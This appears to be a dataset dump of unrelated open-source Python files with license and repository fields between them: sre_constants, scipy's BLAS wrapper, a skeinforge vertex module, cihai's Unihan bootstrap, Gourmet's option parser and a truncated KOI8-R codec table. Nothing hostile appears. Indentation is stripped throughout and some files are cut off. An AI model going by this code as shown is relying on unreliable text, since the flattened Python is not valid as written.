SRE_FLAG_MULTILINE = 8 # treat target as multiline string
SRE_FLAG_DOTALL = 16 # treat target as a single string
SRE_FLAG_UNICODE = 32 # use unicode locale
SRE_FLAG_VERBOSE = 64 # ignore whitespace and comments
SRE_FLAG_DEBUG = 128 # debugging
# flags for INFO primitive
SRE_INFO_PREFIX = 1 # has prefix
SRE_INFO_LITERAL = 2 # entire pattern is literal (given by prefix)
SRE_INFO_CHARSET = 4 # pattern starts with character from given set
if __name__ == "__main__":
def dump(f, d, prefix):
items = d.items()
items.sort(key=lambda a: a[1])
for k, v in items:
f.write("#define %s_%s %s\n" % (prefix, k.upper(), v))
f = open("sre_constants.h", "w")
f.write("""\
/*
* Secret Labs' Regular Expression Engine
*
* regular expression matching engine
*
* NOTE: This file is generated by sre_constants.py. If you need
* to change anything in here, edit sre_constants.py and run it.
*
* Copyright (c) 1997-2001 by Secret Labs AB. All rights reserved.
*
* See the _sre.c file for information on usage and redistribution.
*/
""")
f.write("#define SRE_MAGIC %d\n" % MAGIC)
dump(f, OPCODES, "SRE_OP")
dump(f, ATCODES, "SRE")
dump(f, CHCODES, "SRE")
f.write("#define SRE_FLAG_TEMPLATE %d\n" % SRE_FLAG_TEMPLATE)
f.write("#define SRE_FLAG_IGNORECASE %d\n" % SRE_FLAG_IGNORECASE)
f.write("#define SRE_FLAG_LOCALE %d\n" % SRE_FLAG_LOCALE)
f.write("#define SRE_FLAG_MULTILINE %d\n" % SRE_FLAG_MULTILINE)
f.write("#define SRE_FLAG_DOTALL %d\n" % SRE_FLAG_DOTALL)
f.write("#define SRE_FLAG_UNICODE %d\n" % SRE_FLAG_UNICODE)
f.write("#define SRE_FLAG_VERBOSE %d\n" % SRE_FLAG_VERBOSE)
f.write("#define SRE_INFO_PREFIX %d\n" % SRE_INFO_PREFIX)
f.write("#define SRE_INFO_LITERAL %d\n" % SRE_INFO_LITERAL)
f.write("#define SRE_INFO_CHARSET %d\n" % SRE_INFO_CHARSET)
f.close()
print "done"
|
gpl-3.0
|
DailyActie/Surrogate-Model
|
01-codes/scipy-master/scipy/linalg/blas.py
|
1
|
6822
|
"""
Low-level BLAS functions (:mod:`scipy.linalg.blas`)
===================================================
This module contains low-level functions from the BLAS library.
.. versionadded:: 0.12.0
.. warning::
These functions do little to no error checking.
It is possible to cause crashes by mis-using them,
so prefer using the higher-level routines in `scipy.linalg`.
Finding functions
-----------------
.. autosummary::
:toctree: generated/
get_blas_funcs
find_best_blas_type
BLAS Level 1 functions
----------------------
.. autosummary::
:toctree: generated/
caxpy
ccopy
cdotc
cdotu
crotg
cscal
csrot
csscal
cswap
dasum
daxpy
dcopy
ddot
dnrm2
drot
drotg
drotm
drotmg
dscal
dswap
dzasum
dznrm2
icamax
idamax
isamax
izamax
sasum
saxpy
scasum
scnrm2
scopy
sdot
snrm2
srot
srotg
srotm
srotmg
sscal
sswap
zaxpy
zcopy
zdotc
zdotu
zdrot
zdscal
zrotg
zscal
zswap
BLAS Level 2 functions
----------------------
.. autosummary::
:toctree: generated/
cgemv
cgerc
cgeru
chemv
ctrmv
csyr
cher
cher2
dgemv
dger
dsymv
dtrmv
dsyr
dsyr2
sgemv
sger
ssymv
strmv
ssyr
ssyr2
zgemv
zgerc
zgeru
zhemv
ztrmv
zsyr
zher
zher2
BLAS Level 3 functions
----------------------
.. autosummary::
:toctree: generated/
cgemm
chemm
cherk
cher2k
csymm
csyrk
csyr2k
dgemm
dsymm
dsyrk
dsyr2k
sgemm
ssymm
ssyrk
ssyr2k
zgemm
zhemm
zherk
zher2k
zsymm
zsyrk
zsyr2k
"""
#
# Author: Pearu Peterson, March 2002
# refactoring by Fabian Pedregosa, March 2010
#
from __future__ import division, print_function, absolute_import
__all__ = ['get_blas_funcs', 'find_best_blas_type']
import numpy as _np
from scipy.linalg import _fblas
try:
from scipy.linalg import _cblas
except ImportError:
_cblas = None
# Expose all functions (only fblas --- cblas is an implementation detail)
empty_module = None
del empty_module
# 'd' will be default for 'i',..
_type_conv = {'f': 's', 'd': 'd', 'F': 'c', 'D': 'z', 'G': 'z'}
# some convenience alias for complex functions
_blas_alias = {'cnrm2': 'scnrm2', 'znrm2': 'dznrm2',
'cdot': 'cdotc', 'zdot': 'zdotc',
'cger': 'cgerc', 'zger': 'zgerc',
'sdotc': 'sdot', 'sdotu': 'sdot',
'ddotc': 'ddot', 'ddotu': 'ddot'}
def find_best_blas_type(arrays=(), dtype=None):
"""Find best-matching BLAS/LAPACK type.
Arrays are used to determine the optimal prefix of BLAS routines.
Parameters
----------
arrays : sequence of ndarrays, optional
Arrays can be given to determine optimal prefix of BLAS
routines. If not given, double-precision routines will be
used, otherwise the most generic type in arrays will be used.
dtype : str or dtype, optional
Data-type specifier. Not used if `arrays` is non-empty.
Returns
-------
prefix : str
BLAS/LAPACK prefix character.
dtype : dtype
Inferred Numpy data type.
prefer_fortran : bool
Whether to prefer Fortran order routines over C order.
"""
dtype = _np.dtype(dtype)
prefer_fortran = False
if arrays:
# use the most generic type in arrays
dtypes = [ar.dtype for ar in arrays]
dtype = _np.find_common_type(dtypes, ())
try:
index = dtypes.index(dtype)
except ValueError:
index = 0
if arrays[index].flags['FORTRAN']:
# prefer Fortran for leading array with column major order
prefer_fortran = True
prefix = _type_conv.get(dtype.char, 'd')
if dtype.char == 'G':
# complex256 -> complex128 (i.e., C long double -> C double)
dtype = _np.dtype('D')
elif dtype.char not in 'fdFD':
dtype = _np.dtype('d')
return prefix, dtype, prefer_fortran
def _get_funcs(names, arrays, dtype,
lib_name, fmodule, cmodule,
fmodule_name, cmodule_name, alias):
"""
Return available BLAS/LAPACK functions.
Used also in lapack.py. See get_blas_funcs for docstring.
"""
funcs = []
unpack = False
dtype = _np.dtype(dtype)
module1 = (cmodule, cmodule_name)
module2 = (fmodule, fmodule_name)
if isinstance(names, str):
names = (names,)
unpack = True
prefix, dtype, prefer_fortran = find_best_blas_type(arrays, dtype)
if prefer_fortran:
module1, module2 = module2, module1
for i, name in enumerate(names):
func_name = prefix + name
func_name = alias.get(func_name, func_name)
func = getattr(module1[0], func_name, None)
module_name = module1[1]
if func is None:
func = getattr(module2[0], func_name, None)
module_name = module2[1]
if func is None:
raise ValueError(
'%s function %s could not be found' % (lib_name, func_name))
func.module_name, func.typecode = module_name, prefix
func.dtype = dtype
func.prefix = prefix # Backward compatibility
funcs.append(func)
if unpack:
return funcs[0]
else:
return funcs
def get_blas_funcs(names, arrays=(), dtype=None):
"""Return available BLAS function objects from names.
Arrays are used to determine the optimal prefix of BLAS routines.
Parameters
----------
names : str or sequence of str
Name(s) of BLAS functions without type prefix.
arrays : sequence of ndarrays, optional
Arrays can be given to determine optimal prefix of BLAS
routines. If not given, double-precision routines will be
used, otherwise the most generic type in arrays will be used.
dtype : str or dtype, optional
Data-type specifier. Not used if `arrays` is non-empty.
Returns
-------
funcs : list
List containing the found function(s).
Notes
-----
This routine automatically chooses between Fortran/C
interfaces. Fortran code is used whenever possible for arrays with
column major order. In all other cases, C code is preferred.
In BLAS, the naming convention is that all functions start with a
type prefix, which depends on the type of the principal
matrix. These can be one of {'s', 'd', 'c', 'z'} for the numpy
types {float32, float64, complex64, complex128} respectively.
The code and the dtype are stored in attributes `typecode` and `dtype`
of the returned functions.
"""
return _get_funcs(names, arrays, dtype,
"BLAS", _fblas, _cblas, "fblas", "cblas",
_blas_alias)
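# Illustrative usage sketch (not part of the original module): for float64 arrays the
# 'd' prefix is chosen automatically, so this resolves to daxpy (y <- a*x + y).
#   import numpy as np
#   x, y = np.arange(4.0), np.ones(4)
#   axpy, = get_blas_funcs(('axpy',), (x, y))
#   y = axpy(x, y, a=2.0)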
|
mit
|
jetty840/ReplicatorG
|
skein_engines/skeinforge-50/fabmetheus_utilities/geometry/geometry_tools/vertex.py
|
13
|
1524
|
"""
Vertex of a triangle mesh.
"""
from __future__ import absolute_import
#Init has to be imported first because it has code to work around the python bug where relative imports don't work if the module is imported as a main module.
import __init__
from fabmetheus_utilities.geometry.geometry_utilities import evaluate
from fabmetheus_utilities import xml_simple_reader
__author__ = 'Enrique Perez ([email protected])'
__credits__ = 'Art of Illusion <http://www.artofillusion.org/>'
__date__ = '$Date: 2008/02/05 $'
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
def addGeometryList(elementNode, vertexes):
"Add vertex elements to an xml element."
for vertex in vertexes:
vertexElement = getUnboundVertexElement(vertex)
vertexElement.parentNode = elementNode
elementNode.childNodes.append( vertexElement )
def addVertexToAttributes(attributes, vertex):
"Add to the attribute dictionary."
if vertex.x != 0.0:
attributes['x'] = str(vertex.x)
if vertex.y != 0.0:
attributes['y'] = str(vertex.y)
if vertex.z != 0.0:
attributes['z'] = str(vertex.z)
def getUnboundVertexElement(vertex):
"Add vertex element to an xml element."
vertexElement = xml_simple_reader.ElementNode()
addVertexToAttributes(vertexElement.attributes, vertex)
vertexElement.localName = 'vertex'
return vertexElement
def processElementNode(elementNode):
"Process the xml element."
elementNode.parentNode.xmlObject.vertexes.append(evaluate.getVector3FromElementNode(elementNode))
|
gpl-2.0
|
cihai/cihai-python
|
cihai/data/unihan/bootstrap.py
|
1
|
2283
|
# -*- coding: utf8 - *-
from __future__ import absolute_import, print_function, unicode_literals
from sqlalchemy import Column, String, Table
from unihan_etl import process as unihan
from unihan_etl.process import UNIHAN_MANIFEST
from ...utils import merge_dict
from .constants import UNIHAN_ETL_DEFAULT_OPTIONS, UNIHAN_FIELDS
def bootstrap_unihan(metadata, options={}):
"""Download, extract and import unihan to database."""
options = merge_dict(UNIHAN_ETL_DEFAULT_OPTIONS.copy(), options)
p = unihan.Packager(options)
p.download()
data = p.export()
table = create_unihan_table(UNIHAN_FIELDS, metadata)
metadata.create_all()
metadata.bind.execute(table.insert(), data)
TABLE_NAME = 'Unihan'
def flatten_datasets(d):
return sorted({c for cs in d.values() for c in cs})
DEFAULT_COLUMNS = ['ucn', 'char']
try:
DEFAULT_FIELDS = [f for t, f in UNIHAN_MANIFEST.items() if t in ['Unihan']]
except Exception:
DEFAULT_FIELDS = [f for t, f in UNIHAN_MANIFEST.items()]
def is_bootstrapped(metadata):
"""Return True if cihai is correctly bootstrapped."""
fields = UNIHAN_FIELDS + DEFAULT_COLUMNS
if TABLE_NAME in metadata.tables.keys():
table = metadata.tables[TABLE_NAME]
if set(fields) == set(c.name for c in table.columns):
return True
else:
return False
else:
return False
def create_unihan_table(columns, metadata):
"""Create table and return :class:`sqlalchemy.Table`.
Parameters
----------
columns : list
columns for table, e.g. ``['kDefinition', 'kCantonese']``
metadata : :class:`sqlalchemy.schema.MetaData`
Instance of sqlalchemy metadata
Returns
-------
:class:`sqlalchemy.schema.Table` :
Newly created table with columns and index.
"""
if TABLE_NAME not in metadata.tables:
table = Table(TABLE_NAME, metadata)
table.append_column(Column('char', String(12), primary_key=True))
table.append_column(Column('ucn', String(12), primary_key=True))
for column_name in columns:
col = Column(column_name, String(256), nullable=True)
table.append_column(col)
return table
else:
return Table(TABLE_NAME, metadata)
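# Illustrative usage sketch (not part of the original module; assumes SQLAlchemy 1.x
# style bound metadata, mirroring how bootstrap_unihan() uses it):
#   from sqlalchemy import MetaData, create_engine
#   metadata = MetaData(bind=create_engine('sqlite://'))
#   table = create_unihan_table(['kDefinition'], metadata)
#   metadata.create_all()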
|
bsd-3-clause
|
Ceciliae/gourmet
|
gourmet/OptionParser.py
|
6
|
2260
|
import argparse
import version
try:
import argcomplete
has_argcomplete = True
except ImportError:
has_argcomplete = False
parser = argparse.ArgumentParser(prog='gourmet',description=version.description)
parser.add_argument('--version',action='version',version=version.version)
parser.add_argument('--database-url',action='store',dest='db_url',
help='Custom url for database of form driver://args/location',default='')
parser.add_argument('--plugin-directory',action='store',dest='html_plugin_dir',
help='Directory for webpage import filter plugins.',default='')
parser.add_argument('--use-threads',action='store_const',const=True,dest='threads',
help='Enable threading support.',default=False)
parser.add_argument('--disable-threads',action='store_const',const=False,dest='threads',
help='Disable threading support.')
parser.add_argument('--gourmet-directory',action='store',dest='gourmetdir',
help='Gourmet configuration directory',default='')
parser.add_argument('--debug-threading-interval',action='store',type=float,dest='thread_debug_interval',
help='Interval for threading debug calls',default=5.0)
parser.add_argument('--debug-threading',action='store_true',dest='thread_debug',
help='Print debugging information about threading.')
parser.add_argument('--debug-file',action='store',dest='debug_file',
help='Regular expression that matches filename(s) containing code for which we want to display debug messages.',
default='')
parser.add_argument('--showtimes',action='store_true',dest='time',help='Print timestamps on debug statements.')
parser.add_argument('--disable-psyco',dest='psyco',action='store_false',help='Do not use psyco if it is installed.',
default=True)
group = parser.add_mutually_exclusive_group()
group.add_argument('-q',action='store_const',const=-1,dest='debug',help='Don\'t print gourmet error messages')
group.add_argument('-v',action='count',dest='debug',help='Be verbose (extra v\'s will increase the verbosity level')
if has_argcomplete:
argcomplete.autocomplete(parser)
args = parser.parse_args()
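# Illustrative invocation (hypothetical paths, not part of the original module):
#   gourmet --database-url sqlite:////home/user/recipes.db --use-threads -v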
|
gpl-2.0
|
vipulkanade/EventbriteDjango
|
lib/python2.7/encodings/koi8_r.py
|
593
|
14035
|
""" Python Character Mapping Codec koi8_r generated from 'MAPPINGS/VENDORS/MISC/KOI8-R.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='koi8-r',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
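### Illustrative round-trip (not part of the generated file): per the decoding table
### below, byte 0xF6 maps to CYRILLIC CAPITAL LETTER ZHE, so in Python 2:
###   u'\u0416'.encode('koi8-r') == '\xf6' and '\xf6'.decode('koi8-r') == u'\u0416'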
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> NULL
u'\x01' # 0x01 -> START OF HEADING
u'\x02' # 0x02 -> START OF TEXT
u'\x03' # 0x03 -> END OF TEXT
u'\x04' # 0x04 -> END OF TRANSMISSION
u'\x05' # 0x05 -> ENQUIRY
u'\x06' # 0x06 -> ACKNOWLEDGE
u'\x07' # 0x07 -> BELL
u'\x08' # 0x08 -> BACKSPACE
u'\t' # 0x09 -> HORIZONTAL TABULATION
u'\n' # 0x0A -> LINE FEED
u'\x0b' # 0x0B -> VERTICAL TABULATION
u'\x0c' # 0x0C -> FORM FEED
u'\r' # 0x0D -> CARRIAGE RETURN
u'\x0e' # 0x0E -> SHIFT OUT
u'\x0f' # 0x0F -> SHIFT IN
u'\x10' # 0x10 -> DATA LINK ESCAPE
u'\x11' # 0x11 -> DEVICE CONTROL ONE
u'\x12' # 0x12 -> DEVICE CONTROL TWO
u'\x13' # 0x13 -> DEVICE CONTROL THREE
u'\x14' # 0x14 -> DEVICE CONTROL FOUR
u'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x16 -> SYNCHRONOUS IDLE
u'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x18 -> CANCEL
u'\x19' # 0x19 -> END OF MEDIUM
u'\x1a' # 0x1A -> SUBSTITUTE
u'\x1b' # 0x1B -> ESCAPE
u'\x1c' # 0x1C -> FILE SEPARATOR
u'\x1d' # 0x1D -> GROUP SEPARATOR
u'\x1e' # 0x1E -> RECORD SEPARATOR
u'\x1f' # 0x1F -> UNIT SEPARATOR
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> DELETE
u'\u2500' # 0x80 -> BOX DRAWINGS LIGHT HORIZONTAL
u'\u2502' # 0x81 -> BOX DRAWINGS LIGHT VERTICAL
u'\u250c' # 0x82 -> BOX DRAWINGS LIGHT DOWN AND RIGHT
u'\u2510' # 0x83 -> BOX DRAWINGS LIGHT DOWN AND LEFT
u'\u2514' # 0x84 -> BOX DRAWINGS LIGHT UP AND RIGHT
u'\u2518' # 0x85 -> BOX DRAWINGS LIGHT UP AND LEFT
u'\u251c' # 0x86 -> BOX DRAWINGS LIGHT VERTICAL AND RIGHT
u'\u2524' # 0x87 -> BOX DRAWINGS LIGHT VERTICAL AND LEFT
u'\u252c' # 0x88 -> BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
u'\u2534' # 0x89 -> BOX DRAWINGS LIGHT UP AND HORIZONTAL
u'\u253c' # 0x8A -> BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
u'\u2580' # 0x8B -> UPPER HALF BLOCK
u'\u2584' # 0x8C -> LOWER HALF BLOCK
u'\u2588' # 0x8D -> FULL BLOCK
u'\u258c' # 0x8E -> LEFT HALF BLOCK
u'\u2590' # 0x8F -> RIGHT HALF BLOCK
u'\u2591' # 0x90 -> LIGHT SHADE
u'\u2592' # 0x91 -> MEDIUM SHADE
u'\u2593' # 0x92 -> DARK SHADE
u'\u2320' # 0x93 -> TOP HALF INTEGRAL
u'\u25a0' # 0x94 -> BLACK SQUARE
u'\u2219' # 0x95 -> BULLET OPERATOR
u'\u221a' # 0x96 -> SQUARE ROOT
u'\u2248' # 0x97 -> ALMOST EQUAL TO
u'\u2264' # 0x98 -> LESS-THAN OR EQUAL TO
u'\u2265' # 0x99 -> GREATER-THAN OR EQUAL TO
u'\xa0' # 0x9A -> NO-BREAK SPACE
u'\u2321' # 0x9B -> BOTTOM HALF INTEGRAL
u'\xb0' # 0x9C -> DEGREE SIGN
u'\xb2' # 0x9D -> SUPERSCRIPT TWO
u'\xb7' # 0x9E -> MIDDLE DOT
u'\xf7' # 0x9F -> DIVISION SIGN
u'\u2550' # 0xA0 -> BOX DRAWINGS DOUBLE HORIZONTAL
u'\u2551' # 0xA1 -> BOX DRAWINGS DOUBLE VERTICAL
u'\u2552' # 0xA2 -> BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
u'\u0451' # 0xA3 -> CYRILLIC SMALL LETTER IO
u'\u2553' # 0xA4 -> BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
u'\u2554' # 0xA5 -> BOX DRAWINGS DOUBLE DOWN AND RIGHT
u'\u2555' # 0xA6 -> BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
u'\u2556' # 0xA7 -> BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
u'\u2557' # 0xA8 -> BOX DRAWINGS DOUBLE DOWN AND LEFT
u'\u2558' # 0xA9 -> BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
u'\u2559' # 0xAA -> BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
u'\u255a' # 0xAB -> BOX DRAWINGS DOUBLE UP AND RIGHT
u'\u255b' # 0xAC -> BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
u'\u255c' # 0xAD -> BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
u'\u255d' # 0xAE -> BOX DRAWINGS DOUBLE UP AND LEFT
u'\u255e' # 0xAF -> BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
u'\u255f' # 0xB0 -> BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
u'\u2560' # 0xB1 -> BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
u'\u2561' # 0xB2 -> BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
u'\u0401' # 0xB3 -> CYRILLIC CAPITAL LETTER IO
u'\u2562' # 0xB4 -> BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
u'\u2563' # 0xB5 -> BOX DRAWINGS DOUBLE VERTICAL AND LEFT
u'\u2564' # 0xB6 -> BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
u'\u2565' # 0xB7 -> BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
u'\u2566' # 0xB8 -> BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
u'\u2567' # 0xB9 -> BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
u'\u2568' # 0xBA -> BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
u'\u2569' # 0xBB -> BOX DRAWINGS DOUBLE UP AND HORIZONTAL
u'\u256a' # 0xBC -> BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
u'\u256b' # 0xBD -> BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
u'\u256c' # 0xBE -> BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
u'\xa9' # 0xBF -> COPYRIGHT SIGN
u'\u044e' # 0xC0 -> CYRILLIC SMALL LETTER YU
u'\u0430' # 0xC1 -> CYRILLIC SMALL LETTER A
u'\u0431' # 0xC2 -> CYRILLIC SMALL LETTER BE
u'\u0446' # 0xC3 -> CYRILLIC SMALL LETTER TSE
u'\u0434' # 0xC4 -> CYRILLIC SMALL LETTER DE
u'\u0435' # 0xC5 -> CYRILLIC SMALL LETTER IE
u'\u0444' # 0xC6 -> CYRILLIC SMALL LETTER EF
u'\u0433' # 0xC7 -> CYRILLIC SMALL LETTER GHE
u'\u0445' # 0xC8 -> CYRILLIC SMALL LETTER HA
u'\u0438' # 0xC9 -> CYRILLIC SMALL LETTER I
u'\u0439' # 0xCA -> CYRILLIC SMALL LETTER SHORT I
u'\u043a' # 0xCB -> CYRILLIC SMALL LETTER KA
u'\u043b' # 0xCC -> CYRILLIC SMALL LETTER EL
u'\u043c' # 0xCD -> CYRILLIC SMALL LETTER EM
u'\u043d' # 0xCE -> CYRILLIC SMALL LETTER EN
u'\u043e' # 0xCF -> CYRILLIC SMALL LETTER O
u'\u043f' # 0xD0 -> CYRILLIC SMALL LETTER PE
u'\u044f' # 0xD1 -> CYRILLIC SMALL LETTER YA
u'\u0440' # 0xD2 -> CYRILLIC SMALL LETTER ER
u'\u0441' # 0xD3 -> CYRILLIC SMALL LETTER ES
u'\u0442' # 0xD4 -> CYRILLIC SMALL LETTER TE
u'\u0443' # 0xD5 -> CYRILLIC SMALL LETTER U
u'\u0436' # 0xD6 -> CYRILLIC SMALL LETTER ZHE
u'\u0432' # 0xD7 -> CYRILLIC SMALL LETTER VE
u'\u044c' # 0xD8 -> CYRILLIC SMALL LETTER SOFT SIGN
u'\u044b' # 0xD9 -> CYRILLIC SMALL LETTER YERU
u'\u0437' # 0xDA -> CYRILLIC SMALL LETTER ZE
u'\u0448' # 0xDB -> CYRILLIC SMALL LETTER SHA
u'\u044d' # 0xDC -> CYRILLIC SMALL LETTER E
u'\u0449' # 0xDD -> CYRILLIC SMALL LETTER SHCHA
u'\u0447' # 0xDE -> CYRILLIC SMALL LETTER CHE
u'\u044a' # 0xDF -> CYRILLIC SMALL LETTER HARD SIGN
u'\u042e' # 0xE0 -> CYRILLIC CAPITAL LETTER YU
u'\u0410' # 0xE1 -> CYRILLIC CAPITAL LETTER A
u'\u0411' # 0xE2 -> CYRILLIC CAPITAL LETTER BE
u'\u0426' # 0xE3 -> CYRILLIC CAPITAL LETTER TSE
u'\u0414' # 0xE4 -> CYRILLIC CAPITAL LETTER DE
u'\u0415' # 0xE5 -> CYRILLIC CAPITAL LETTER IE
u'\u0424' # 0xE6 -> CYRILLIC CAPITAL LETTER EF
u'\u0413' # 0xE7 -> CYRILLIC CAPITAL LETTER GHE
u'\u0425' # 0xE8 -> CYRILLIC CAPITAL LETTER HA
u'\u0418' # 0xE9 -> CYRILLIC CAPITAL LETTER I
u'\u0419' # 0xEA -> CYRILLIC CAPITAL LETTER SHORT I
u'\u041a' # 0xEB -> CYRILLIC CAPITAL LETTER KA
u'\u041b' # 0xEC -> CYRILLIC CAPITAL LETTER EL
u'\u041c' # 0xED -> CYRILLIC CAPITAL LETTER EM
u'\u041d' # 0xEE -> CYRILLIC CAPITAL LETTER EN
u'\u041e' # 0xEF -> CYRILLIC CAPITAL LETTER O
u'\u041f' # 0xF0 -> CYRILLIC CAPITAL LETTER PE
u'\u042f' # 0xF1 -> CYRILLIC CAPITAL LETTER YA
u'\u0420' # 0xF2 -> CYRILLIC CAPITAL LETTER ER
u'\u0421' # 0xF3 -> CYRILLIC CAPITAL LETTER ES
u'\u0422' # 0xF4 -> CYRILLIC CAPITAL LETTER TE
u'\u0423' # 0xF5 -> CYRILLIC CAPITAL LETTER U
u'\u0416' # 0xF6 -> CYRILLIC CAPITAL LETTER ZHE
u'\u0412' # 0xF7 -> CYRILLIC CAPITAL LETTER VE
u'\u042c' # 0xF8 -> CYRILLIC CAPITAL LETTER SOFT SIGN
u'\u042b' # 0xF9 -> CYRILLIC CAPITAL LETTER YERU
u'\u0417' # 0xFA -> CYRILLIC CAPITAL LETTER ZE
